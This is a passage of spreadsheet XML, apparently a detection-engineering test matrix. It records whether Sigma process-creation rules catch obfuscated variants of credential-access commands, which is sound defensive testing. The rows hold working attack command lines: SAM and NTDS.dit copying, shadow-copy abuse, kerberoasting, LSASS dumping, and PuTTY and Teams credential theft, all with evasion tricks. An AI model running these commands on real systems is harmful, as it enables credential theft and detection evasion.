          <t>powershell.exe -"Command" "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F754" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G754" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H754" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I754" s="43" t="n"/>
      <c r="J754" s="43" t="n"/>
      <c r="K754" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="755" ht="15.75" customHeight="1" s="42">
      <c r="A755" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B755" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_shadow_copies_creation</t>
        </is>
      </c>
      <c r="C755" s="43" t="inlineStr">
        <is>
          <t>Shadow Copies Creation Using Operating Systems Utilities</t>
        </is>
      </c>
      <c r="D755" s="43" t="inlineStr">
        <is>
          <t>b17ea6f7-6e90-447e-a799-e6c0a493d6ce</t>
        </is>
      </c>
      <c r="E755" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Invoke-WmiMethod -Class ('Win32_Shad' + 'owCopy') -Name ('Cre' + 'ate') -ArgumentList 'C:\'"</t>
        </is>
      </c>
      <c r="F755" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G755" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H755" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I755" s="43" t="n"/>
      <c r="J755" s="43" t="n"/>
      <c r="K755" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="756" ht="15.75" customHeight="1" s="42">
      <c r="A756" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B756" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C756" s="43" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D756" s="43" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E756" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H756" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I756" s="43" t="n"/>
      <c r="J756" s="43" t="n"/>
      <c r="K756" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="757" ht="15.75" customHeight="1" s="42">
      <c r="A757" s="43" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B757" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_tasklist_module_enumeration</t>
        </is>
      </c>
      <c r="C757" s="43" t="inlineStr">
        <is>
          <t>Loaded Module Enumeration Via Tasklist.EXE</t>
        </is>
      </c>
      <c r="D757" s="43" t="inlineStr">
        <is>
          <t>34275eb8-fa19-436b-b959-3d9ecd53fa1f</t>
        </is>
      </c>
      <c r="E757" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-Process | Where-Object { $_.Modules.ModuleName -contains 'rdpcorets.dll' }"</t>
        </is>
      </c>
      <c r="F757" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G757" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H757" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I757" s="43" t="n"/>
      <c r="J757" s="43" t="n"/>
      <c r="K757" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="758" ht="15.75" customHeight="1" s="42">
      <c r="A758" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B758" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C758" s="43" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D758" s="43" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E758" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "m^kli^n^k /D C:\temp\vss \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F758" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G758" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H758" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I758" s="43" t="n"/>
      <c r="J758" s="43" t="n"/>
      <c r="K758" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="759" ht="15.75" customHeight="1" s="42">
      <c r="A759" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B759" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C759" s="43" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D759" s="43" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E759" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H759" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I759" s="43" t="n"/>
      <c r="J759" s="43" t="n"/>
      <c r="K759" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="760" ht="15.75" customHeight="1" s="42">
      <c r="A760" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B760" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_mklink_shadow_copies_access_symlink</t>
        </is>
      </c>
      <c r="C760" s="43" t="inlineStr">
        <is>
          <t>VolumeShadowCopy Symlink Creation Via Mklink</t>
        </is>
      </c>
      <c r="D760" s="43" t="inlineStr">
        <is>
          <t>40b19fa6-d835-400c-b301-41f3a2baacaf</t>
        </is>
      </c>
      <c r="E760" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "New-Item -ItemType SymbolicLink -Path C:\temp\vss_link -Target \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1"</t>
        </is>
      </c>
      <c r="F760" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G760" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H760" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I760" s="43" t="n"/>
      <c r="J760" s="43" t="n"/>
      <c r="K760" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="761" ht="15.75" customHeight="1" s="42">
      <c r="A761" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B761" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C761" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D761" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E761" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "$src='\HarddiskVolumeShadow'+'Copy1\Windows\System32\config\s'+'am'; Copy-Item $src C:\temp\sam"</t>
        </is>
      </c>
      <c r="F761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G761" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I761" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J761" s="43" t="n"/>
      <c r="K761" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="15.75" customHeight="1" s="42">
      <c r="A762" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B762" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C762" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D762" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E762" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "$src='\HarddiskVolumeShadow'+'Copy1\Windows\System32\config\s'+'am'; Copy-Item $src C:\temp\sam"</t>
        </is>
      </c>
      <c r="F762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G762" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I762" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J762" s="43" t="n"/>
      <c r="K762" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="15.75" customHeight="1" s="42">
      <c r="A763" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B763" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C763" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D763" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E763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3" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G763" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I763" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J763" s="43" t="n"/>
      <c r="K763" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="15.75" customHeight="1" s="42">
      <c r="A764" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B764" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C764" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D764" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E764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4" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G764" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I764" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J764" s="43" t="n"/>
      <c r="K764" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1" s="42">
      <c r="A765" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B765" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C765" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D765" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E765" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand"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5" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G765" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H765" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I765" s="43" t="n"/>
      <c r="J765" s="43" t="n"/>
      <c r="K765" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1" s="42">
      <c r="A766" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B766" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C766" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D766" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E766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6" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G766" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H766" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I766" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J766" s="43" t="n"/>
      <c r="K766" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1" s="42">
      <c r="A767" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B767" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C767" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D767" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E767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7" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G767" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H767" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I767" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J767" s="43" t="n"/>
      <c r="K767" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1" s="42">
      <c r="A768" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B768" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C768" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D768" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E768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8" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G768" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I768" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J768" s="43" t="n"/>
      <c r="K768" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1" s="42">
      <c r="A769" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B769" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C769" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D769" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E769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69" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G769" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H769" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I769" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J769" s="43" t="n"/>
      <c r="K769" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1" s="42">
      <c r="A770" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B770" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C770" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D770" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E770" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ENcOdEdCOmMaNd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70" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G770" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H770" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I770" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J770" s="43" t="n"/>
      <c r="K770" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1" s="42">
      <c r="A771" s="43" t="inlineStr">
        <is>
          <t>t1003.002</t>
        </is>
      </c>
      <c r="B771" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_sam_access</t>
        </is>
      </c>
      <c r="C771" s="43" t="inlineStr">
        <is>
          <t>PowerShell SAM Copy</t>
        </is>
      </c>
      <c r="D771" s="43" t="inlineStr">
        <is>
          <t>1af57a4b-460a-4738-9034-db68b880c665</t>
        </is>
      </c>
      <c r="E771" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand"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771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H771" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I771" s="43" t="n"/>
      <c r="J771" s="43" t="n"/>
      <c r="K771" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1" s="42">
      <c r="A772" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B772" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C772" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D772" s="43" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E772" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H772" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I772" s="43" t="n"/>
      <c r="J772" s="43" t="n"/>
      <c r="K772" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1" s="42">
      <c r="A773" s="43" t="inlineStr">
        <is>
          <t>t1003.003</t>
        </is>
      </c>
      <c r="B773" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_ntds</t>
        </is>
      </c>
      <c r="C773" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Patterns NTDS.DIT Exfil</t>
        </is>
      </c>
      <c r="D773" s="43" t="inlineStr">
        <is>
          <t>8bc64091-6875-4881-aaf9-7bd25b5dda08</t>
        </is>
      </c>
      <c r="E773" s="43" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Copy-Item ('C:\Windows\NTDS\nt' + 'ds.dit') -Destination 'C:\exfil\data.bin'"</t>
        </is>
      </c>
      <c r="F773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H773" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I773" s="43" t="n"/>
      <c r="J773" s="43" t="n"/>
      <c r="K773" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1" s="42">
      <c r="A774" s="43" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B774" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C774" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D774" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E774" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\updater.exe k^erberoast /outfile:hashes.txt"</t>
        </is>
      </c>
      <c r="F774" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I774" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution (7ec2c172-dceb-4c10-92c9-87c1881b7e18)</t>
        </is>
      </c>
      <c r="J774" s="43" t="n"/>
      <c r="K774" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1" s="42">
      <c r="A775" s="43" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B775" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_teams_suspicious_command_line_cred_access</t>
        </is>
      </c>
      <c r="C775" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Command Targeting Teams Sensitive Files</t>
        </is>
      </c>
      <c r="D775" s="43" t="inlineStr">
        <is>
          <t>d2eb17db-1d39-41dc-b57f-301f6512fa75</t>
        </is>
      </c>
      <c r="E775" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set A=\Microsoft\Teams&amp; set B=\Cookies&amp; call xcopy %APPDATA%%A%%B% C:\temp\ /E"</t>
        </is>
      </c>
      <c r="F775" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I775" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Command Targeting Teams Sensitive Files (d2eb17db-1d39-41dc-b57f-301f6512fa75)</t>
        </is>
      </c>
      <c r="J775" s="43" t="n"/>
      <c r="K775" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1" s="42">
      <c r="A776" s="43" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B776" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_enumeration_for_credentials_cli</t>
        </is>
      </c>
      <c r="C776" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI</t>
        </is>
      </c>
      <c r="D776" s="43" t="inlineStr">
        <is>
          <t>87a476dc-0079-4583-a985-dee7a20a03de</t>
        </is>
      </c>
      <c r="E776" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg query HKCU\Software\SimonTatham\Pu^TTY\Sessions /t REG_SZ /s"</t>
        </is>
      </c>
      <c r="F776" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I776" s="43" t="inlineStr">
        <is>
          <t>Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de); Enumeration for Credentials in Registry (e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1)</t>
        </is>
      </c>
      <c r="J776" s="43" t="n"/>
      <c r="K776" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1" s="42">
      <c r="A777" s="43" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B777" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C777" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D777" s="43" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E777" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ""C:\WINDOWS\system32\rundll32.exe" keymgr,KRS^howKeyMgr"</t>
        </is>
      </c>
      <c r="F777" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I777" s="43" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access (a4694263-59a8-4608-a3a0-6f8d3a51664c); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J777" s="43" t="n"/>
      <c r="K777" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1" s="42">
      <c r="A778" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B778" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C778" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D778" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E778" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c chrome.exe --remote-debugging^--port=9222</t>
        </is>
      </c>
      <c r="F778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I778" s="43" t="n"/>
      <c r="J778" s="43" t="n"/>
      <c r="K778" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1" s="42">
      <c r="A779" s="43" t="inlineStr">
        <is>
          <t>t1185</t>
        </is>
      </c>
      <c r="B779" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_browsers_remote_debugging</t>
        </is>
      </c>
      <c r="C779" s="43" t="inlineStr">
        <is>
          <t>Browser Started with Remote Debugging</t>
        </is>
      </c>
      <c r="D779" s="43" t="inlineStr">
        <is>
          <t>b3d34dc5-2efd-4ae3-845f-8ec14921f449</t>
        </is>
      </c>
      <c r="E779" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c firefox.exe -start-debugger-server^ 6000</t>
        </is>
      </c>
      <c r="F779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I779" s="43" t="n"/>
      <c r="J779" s="43" t="n"/>
      <c r="K779" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1" s="42">
      <c r="A780" s="43" t="inlineStr">
        <is>
          <t>t1018</t>
        </is>
      </c>
      <c r="B780" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C780" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D780" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E780" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I780" s="43" t="n"/>
      <c r="J780" s="43" t="n"/>
      <c r="K780" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1" s="42">
      <c r="A781" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B781" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_xordump</t>
        </is>
      </c>
      <c r="C781" s="43" t="inlineStr">
        <is>
          <t>HackTool - XORDump Execution</t>
        </is>
      </c>
      <c r="D781" s="43" t="inlineStr">
        <is>
          <t>66e563f9-1cbd-4a22-a957-d8b7c0f44372</t>
        </is>
      </c>
      <c r="E781" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\update_service.exe -p^rocess lsass.exe -m c^omsvcs"</t>
        </is>
      </c>
      <c r="F781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I781" s="43" t="n"/>
      <c r="J781" s="43" t="n"/>
      <c r="K781" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1" s="42">
      <c r="A782" s="43" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B782" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_createdump</t>
        </is>
      </c>
      <c r="C782" s="43" t="inlineStr">
        <is>
          <t>Renamed CreateDump Utility Execution</t>
        </is>
